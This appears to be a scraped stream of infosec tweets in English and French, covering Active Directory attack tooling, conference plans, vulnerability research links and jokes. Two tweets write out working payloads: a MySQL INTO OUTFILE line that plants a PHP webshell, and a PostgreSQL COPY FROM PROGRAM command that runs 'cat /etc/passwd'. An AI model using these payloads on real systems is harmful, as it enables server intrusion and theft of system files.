Jean Marsault

@DirectoryRanger @ZephrFish @ZephrFish if you want take a look at my ex-colleague @remiescourrou's work: github.com/RemiEscourrou/… it was working without RSAT and without the need for having a domain-joined workstation😉 But it was eons ago so it'd need to be refreshed

AD CS LOLBAS Toolkit, by @ZephrFish github.com/ZephrFish/LOLA…

@PyroTek3 That's why Tenant Restriction v2 does not only rely on SSL breakout for connections to GraphAPI but also provides a local agent to intercept requests before they're even sent to the SSL-encrypting layer.

TL;DR: Microsoft strongly recommends that you don't perform SSL/TLS breakout on Microsoft cloud connections.

@techspence All your files have been encrypted

Scare a sysadmin in 6 words… Domain Admins can log into laptops

@PoliceNatListe @AlertesInfos youtu.be/1Y1ya-yF35g?si…

@AlertesInfos Combien de bombes nucléaires ont les États-Unis ?

🚨🇺🇸🇮🇷☢️ ALERTE - Les États-Unis affirment qu’il ne faudrait que "deux semaines" à l’Iran pour fabriquer une bombe nucléaire. (Maison-Blanche)

@HackAndDo @LoginSecurite See you there buddy

Je serai à #LeHack vendredi 27 et samedi 28 juin, et si tu n'as pas encore ta place, tente ta chance pour venir gratuitement, en résolvant ce petit challenge made by @LoginSecurite 💪 linkedin.com/posts/login-s-…

🚀 We just released my research on BadSuccessor - a new unpatched Active Directory privilege escalation vulnerability It allows compromising any user in AD, it works with the default config, and.. Microsoft currently won't fix it 🤷‍♂️ Read Here - akamai.com/blog/security-…

@binitamshah How is "mshta calls VBS to download PS1" not flagged by every EDR out there?

Fileless Execution : PowerShell Based Shellcode Loader Executes Remcos RAT : blog.qualys.com/vulnerabilitie…

trying my luck here, has anyone struggled with "message stream modified" when trying to use a ccache file, valid with KfW, recognized by klist and usable by kinit / kvno, but a Java-based app fails with this error?

@_BashBunny_ @vxunderground Don't worry there is hash integrity check

How to get free malware @vxunderground

@DharaniSanjaiy @OtterHacker Only if you have write permissions with the mysql service account, which you don't by default (and in many cases i've seen)

@OtterHacker For MYSQL: SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php'; Been using this for a while.. works most of the time if you got SQLi. Just slap a webshell on the target (not the smartest move, but hey, it works), and boom, you're in.

I'm in my database period RCE with PostgreSQL DROP TABLE IF EXISTS files; CREATE TABLE files(filename text); COPY files FROM PROGRAM 'cat /etc/passwd'; SELECT * FROM files ORDER BY filename ASC;

@OtterHacker @OtterHacker was today years old when he discovered it also raised alerts in event logs :D learn.microsoft.com/en-us/previous…

I was today old when I learnt that you can't use a ST on a DC that generated it. It seems to be a security feature to avoid replay attack. But if you activate Protected User on a domain with one DC you basically just locked you down but prevent attacks through SID History...

Breaking PHP's mt_rand() with 2 values and no bruteforce ambionics.io/blog/php-mt-ra…

A few months ago I've created a "Pefect DLL Loader". You can find some details on my article that was just published today ! The full implem can be found directly in the @defcon workshop in my github ! Hope you will learn something in this 😊 riskinsight-wavestone.com/en/2024/10/loa…

Thanks to a great article from @itm4n, I discovered a bypass to install vulnerable printer's drivers when low level users are allowed to install them on Windows allowing escalating privileges. He published a detailed explanation: itm4n.github.io/printnightmare…

@_nwodtuhs Congratz dude! Kudos for your previous work and I'm sure you'll keep rocking 💪

After ~6y at Capgemini, a new chapter of my life is starting as freelancer ✨ Learned a ton, met amazing people, tackled big challenges. Grateful for everyone who supported me along the way. I'll focus on The Hacker Recipes & Exegol, and offer my skills to those needing it ✌️

Y'a que moi qui ai l'impression que le wifi SNCF c'est de pire en pire ? Et je vous dis pas si c'est vraiment des Mb et pas des Mo...

@Tr4LSecurity @gentilkiwi Sans compter 1 manager tous les 7 a 77 analystes

@gentilkiwi @iansus Un seul ? Pas de coach agile pour gérer les comm' ?

Va falloir expliquer ce qu'on appelle une cyber attaque hein, j'en ai déjà géré plusieurs dizaines, mais de la a en avoir 1 pour chaque paire d'humain sur la planète... 🤔 Ou alors 1 paquet malveillant (most likely DDoS) == une cyber attaque ? 01net.com/actualites/4-m…

@gentilkiwi J'ai lu "ouvert et ferme a la fois" je me suis dit que tu tenais un truc. La socket de Schrodinger

@iansus Rien ne vaut un petit socket de nos terroirs ouvert et fermé à la main #nosartisansontdutalent

@gentilkiwi Que ce soit pour la red ou la blue team ça m'a pas l'air très très efficace 👀

@iansus Quoi ? Tu ne mets pas un analyste derrière chaque tentative de connexion non légitime ?